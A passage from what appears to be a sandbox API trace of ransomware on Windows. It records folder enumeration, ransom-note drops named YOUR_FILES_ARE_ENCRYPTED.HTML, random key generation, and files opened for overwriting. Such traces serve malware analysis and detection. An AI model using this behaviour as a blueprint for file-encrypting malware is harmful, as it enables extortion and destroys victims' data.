dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.415] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0110.415] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0110.415] GetProcessHeap () returned 0x600000 [0110.415] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\queue\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.415] GetProcessHeap () returned 0x600000 [0110.415] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.415] GetProcessHeap () returned 0x600000 [0110.415] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.416] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName="SentItems", cAlternateFileName="SENTIT~1")) returned 1 [0110.416] StrStrIW (lpFirst="SentItems", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.416] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems") returned 59 [0110.416] GetProcessHeap () returned 0x600000 [0110.416] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.417] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems" [0110.417] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*" [0110.417] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf81f0df, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.418] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf81f0df, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="..", cAlternateFileName="")) returned 1 [0110.418] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf81f0df, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf81f0df, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf823ef7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.418] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf81f0df, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf81f0df, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf823ef7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.418] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.418] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0110.419] GetProcessHeap () returned 0x600000 [0110.419] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\sentitems\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.419] GetProcessHeap () returned 0x600000 [0110.419] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.419] GetProcessHeap () returned 0x600000 [0110.419] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.420] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 1 [0110.420] StrStrIW (lpFirst="VirtualInbox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.420] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned 62 [0110.420] GetProcessHeap () returned 0x600000 [0110.420] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.421] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0110.421] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*" [0110.421] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xaf839e4c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.421] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xaf839e4c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="..", cAlternateFileName="")) returned 1 [0110.421] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="en-US", cAlternateFileName="")) returned 1 [0110.421] StrStrIW (lpFirst="en-US", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.421] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned 68 [0110.421] GetProcessHeap () returned 0x600000 [0110.421] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.422] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" [0110.422] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*" [0110.422] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xaf82eecd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0110.422] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xaf82eecd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0110.422] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa476ffa8, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xa476ffa8, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xa476ffa8, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x15dbe, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="WelcomeFax.tif", cAlternateFileName="")) returned 1 [0110.422] StrStrIW (lpFirst="WelcomeFax.tif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.422] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif") returned 83 [0110.422] PathFindExtensionW (pszPath="WelcomeFax.tif") returned=".tif" [0110.422] lstrlenW (lpString=".tif") returned 4 [0110.422] PathFindExtensionW (pszPath="WelcomeFax.tif") returned=".tif" [0110.422] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0110.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0110.422] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf82eecd, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf82eecd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf833c9f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.423] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf82eecd, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf82eecd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf833c9f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.423] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0110.423] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0110.423] GetProcessHeap () returned 0x600000 [0110.423] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.423] GetProcessHeap () returned 0x600000 [0110.423] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.423] GetProcessHeap () returned 0x600000 [0110.423] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.424] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf839e4c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf839e4c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf83efce, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.424] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf839e4c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf839e4c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf83efce, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6363f0, dwReserved1=0x63c420, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.424] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.424] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0110.424] GetProcessHeap () returned 0x600000 [0110.424] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.424] GetProcessHeap () returned 0x600000 [0110.424] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.424] GetProcessHeap () returned 0x600000 [0110.424] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.426] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf83ffe6, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf83ffe6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8450b1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.426] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf83ffe6, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf83ffe6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8450b1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.426] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.426] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0110.426] GetProcessHeap () returned 0x600000 [0110.426] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.426] GetProcessHeap () returned 0x600000 [0110.426] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.426] GetProcessHeap () returned 0x600000 [0110.426] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.427] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="MSScan", cAlternateFileName="")) returned 1 [0110.427] StrStrIW (lpFirst="MSScan", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.427] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan") returned 50 [0110.427] GetProcessHeap () returned 0x600000 [0110.427] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.428] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan" [0110.428] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*" [0110.428] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf86849f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName=".", cAlternateFileName="")) returned 0x626778 [0110.428] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf86849f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName="..", cAlternateFileName="")) returned 1 [0110.428] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62dcb75e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x62dcb75e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x62dcb75e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7e148, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName="WelcomeScan.jpg", cAlternateFileName="")) returned 1 [0110.428] StrStrIW (lpFirst="WelcomeScan.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.428] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned 66 [0110.428] PathFindExtensionW (pszPath="WelcomeScan.jpg") returned=".jpg" [0110.428] lstrlenW (lpString=".jpg") returned 4 [0110.428] PathFindExtensionW (pszPath="WelcomeScan.jpg") returned=".jpg" [0110.428] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0110.428] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf86849f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf86849f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf86e63f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.428] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf86849f, 